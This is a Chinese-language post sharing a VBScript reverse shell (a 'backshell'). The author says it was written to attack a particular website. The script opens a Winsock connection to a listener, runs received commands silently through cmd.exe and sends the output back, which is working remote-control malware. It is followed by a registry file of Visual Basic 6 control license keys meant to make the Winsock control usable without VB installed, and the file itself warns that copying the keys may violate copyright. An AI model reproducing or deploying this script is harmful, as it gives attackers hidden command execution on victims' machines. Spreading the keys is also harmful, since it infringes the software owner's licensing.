TCP版backshell的VBS脚本代码

TCP版backshell的VBS脚本

 

'搞一个特殊的站准备用的，没想到，等写完了，洞补上了，郁闷 
'by 009, baicker@hotmail.com 
'date:071221 

Dim revdata 
set sock=WScript.createobject( "MSWinsock.Winsock" , "WSEvent_" ) 
set sc=createobject( "WScript.Shell" ) 
Set fso =CreateObject( "Scripting.FileSystemObject" ) 
sock.connect "127.0.0.1" , 1234 

Sub WSEvent_Connect() 
wscript.echo "Connected!" 
end sub 

Sub WSEvent_DataArrival(bytes) 
MyString= "blank"  
sock.GetData MyString 
revdata=MyString 
if bytes> 0 then 
if instr(revdata, "exit" )> 0 then 
sock.close 
sock.close 
sock= nothing 
bClose= true 
exit sub 
else 
on error resume next 
tempfile= "C:/" & fso.GetTempName 
cmd=left(revdata,len(revdata)- 1 ) 
call sc.Run ( "cmd.exe /c " & cmd & " > " & tempfile, 0 , True ) 
Set txf = fso.OpenTextFile(tempfile, 1 , false , 0 ) 
sock.senddata txf.readall & vbcrlf & vbcrlf 
txf.close 
call fso.DeleteFile(TempFile, True ) 
end if 
sock.senddata "009>" 
end if 
end sub 

While Not bClose 
WScript.Sleep 1 
Wend 

————————————————————————————————————— 
调用winsock，未装VB的需要导入注册表 
—————————————— vb6controls.reg —————————————————- 
REGEDIT 
HKEY_CLASSES_ROOT/Licenses = Licensing: Copying the keys may be a violation of established copyrights. 

// Masked Edit Control 6.0 license key 
HKEY_CLASSES_ROOT/Licenses/BC96F860-9928-11cf-8AFA-00AA00C00905 = mmimfflflmqmlfffrlnmofhfkgrlmmfmqkqj 

// Chart Control 6.0 (OLEDB) license key 
HKEY_CLASSES_ROOT/Licenses/12B142A4-BD51-11d1-8C08-0000F8754DA1 = aadhgafabafajhchnbchehfambfbbachmfmb 

// Common Dialog Control 6.0 license key 
HKEY_CLASSES_ROOT/Licenses/4D553650-6ABE-11cf-8ADB-00AA00C00905 = gfjmrfkfifkmkfffrlmmgmhmnlulkmfmqkqj 

// ADO Data Control 6.0 (OLEDB) license key 
HKEY_CLASSES_ROOT/Licenses/C4145310-469C-11d1-B182-00A0C922E820 = konhqhioohihphkouimonhqhvnwiqhhhnjti 

// Common Controls-3 6.0 license key 
HKEY_CLASSES_ROOT/Licenses/38911DA0-E448-11D0-84A3-00DD01104159 = mcpckchcdchjcjcclidcgcgchdqdcjhcojpd 

// Windows Common Controls-2 5.0 (SP2) license key 
HKEY_CLASSES_ROOT/Licenses/9E799BF1-8817-11cf-958F-0020AFC28C3B = uqpqnqkjujkjjjjqwktjrjkjtkupsjnjtoun 

// Windows Common Controls license key 
HKEY_CLASSES_ROOT/Licenses/57CBF9E0-6AA7-11cf-8ADB-00AA00C00905 = aahakhchghkhfhaamghhbhbhkbpgfhahlfle 

// Data Bound Grid Control 5.0(SP3) license key 
HKEY_CLASSES_ROOT/Licenses/556C75F1-EFBC-11CF-B9F3-00A0247033C4 = xybiedobrqsprbijaegcbislrsiucfjdhisl 

// Data Bound List Controls 6.0 license key 
HKEY_CLASSES_ROOT/Licenses/096EFC40-6ABF-11cf-850C-08002B30345D = knsgigmnmngnmnigthmgpninrmumhgkgrlrk 

// Internet Transfer Control 6.0 license key 
HKEY_CLASSES_ROOT/Licenses/78E1BDD1-9941-11cf-9756-00AA00C00908 = yjrjvqkjlqqjnqkjvprqsjnjvkuknjpjtoun 

// Multimedia Control 6.0 license key 
HKEY_CLASSES_ROOT/Licenses/B1EFCCF0-6AC1-11cf-8ADB-00AA00C00905 = qqkjvqpqmqjjpqjjvpqqkqmqvkypoqjquoun 

// Chart Control 6.0 license key 
HKEY_CLASSES_ROOT/Licenses/7C35CA30-D112-11cf-8E72-00A0C90F26F8 = whmhmhohmhiorhkouimhihihwiwinhlosmsl 

// Windows Common Controls-2 6.0 license key 
HKEY_CLASSES_ROOT/Licenses/4F86BADF-9F77-11d1-B1B7-0000F8753F5D = iplpwpnippopupiivjrioppisjsjlpiiokuj 

// Windows Common Controls 6.0 license key 
HKEY_CLASSES_ROOT/Licenses/ED4B87C4-9F76-11d1-8BF7-0000F8754DA1 = knlggnmntgggrninthpgmnngrhqhnnjnslsh 

// Comm Control 6.0 license key 
HKEY_CLASSES_ROOT/Licenses/4250E830-6AC2-11cf-8ADB-00AA00C00905 = kjljvjjjoquqmjjjvpqqkqmqykypoqjquoun 

// DataGrid Control 6.0 (OLEDB) license key 
HKEY_CLASSES_ROOT/Licenses/CDE57A55-8B86-11D0-b3C6-00A0C90AEA82 = ekpkhddkjkekpdjkqemkfkldoeoefkfdjfqe 

// DataList Control 6.0 (OLEDB) license key 
HKEY_CLASSES_ROOT/Licenses/A133F000-CCB0-11d0-A316-00AA00688B10 = cibbcimbpihbbbbbnhdbeidiocmcbbdbgdoc 

// DBWin license key 
HKEY_CLASSES_ROOT/Licenses/D015B071-D2ED-11d0-A31A-00AA00688B10 = gjdcfjpcmjicjcdcoihcechjlioiccechepd 

// MSDBRPT license key 
HKEY_CLASSES_ROOT/Licenses/9DF1A470-BA8E-11D0-849C-00A0C90DC8A9 = cchcqjejhcgcqcfjpdfcdjkckiqikchcojpd 

// FlexGrid Control 6.0 license key 
HKEY_CLASSES_ROOT/Licenses/72E67120-5959-11cf-91F6-C2863C385E30 = ibcbbbebqbdbciebmcobmbhifcmciibblgmf 

// MAPI Controls 6.0 license key 
HKEY_CLASSES_ROOT/Licenses/899B3E80-6AC6-11cf-8ADB-00AA00C00905 = wjsjjjlqmjpjrjjjvpqqkqmqukypoqjquoun 

// MSRDO 2.0 license key 
HKEY_CLASSES_ROOT/Licenses/B1692F60-23B0-11D0-8E95-00A0C90F26F8 = mjjjccncgjijrcfjpdfjfcejpdkdkcgjojpd 

// RemoteData Control 6.0 license key 
HKEY_CLASSES_ROOT/Licenses/43478d75-78e0-11cf-8e78-00a0d100038e = imshohohphlmnhimuinmphmmuiminhlmsmsl 

// Windowless Controls 6.0 license key 
HKEY_CLASSES_ROOT/Licenses/80E80EF0-DBBE-11D0-BCE2-00A0C90DCA10 = qijimitpmpnpxplpvjnikpkpqoxjmpkpoivj 

// PictureClip Control 6.0 license key 
HKEY_CLASSES_ROOT/Licenses/6FB38640-6AC7-11cf-8ADB-00AA00C00905 = gdjkokgdldikhdddpjkkekgknesjikdkoioh 

// Rich TextBox Control 6.0 license key 
HKEY_CLASSES_ROOT/Licenses/DC4D7920-6AC8-11cf-8ADB-00AA00C00905 = iokouhloohrojhhhtnooiokomiwnmohosmsl 

// Sheridan Tab Control license key 
HKEY_CLASSES_ROOT/Licenses/190B7910-992A-11cf-8AFA-00AA00C00905 = gclclcejjcmjdcccoikjlcecoioijjcjnhng 

// SysInfo Control 6.0 license key 
HKEY_CLASSES_ROOT/Licenses/E32E2733-1BC5-11d0-B8C3-00A0C90DCA10 = kmhfimlflmmfpffmsgfmhmimngtghmoflhsg 

// Winsock Control 6.0 license key 
HKEY_CLASSES_ROOT/Licenses/2c49f800-c2dd-11cf-9ad6-0080c7e7b78d = mlrljgrlhltlngjlthrligklpkrhllglqlrk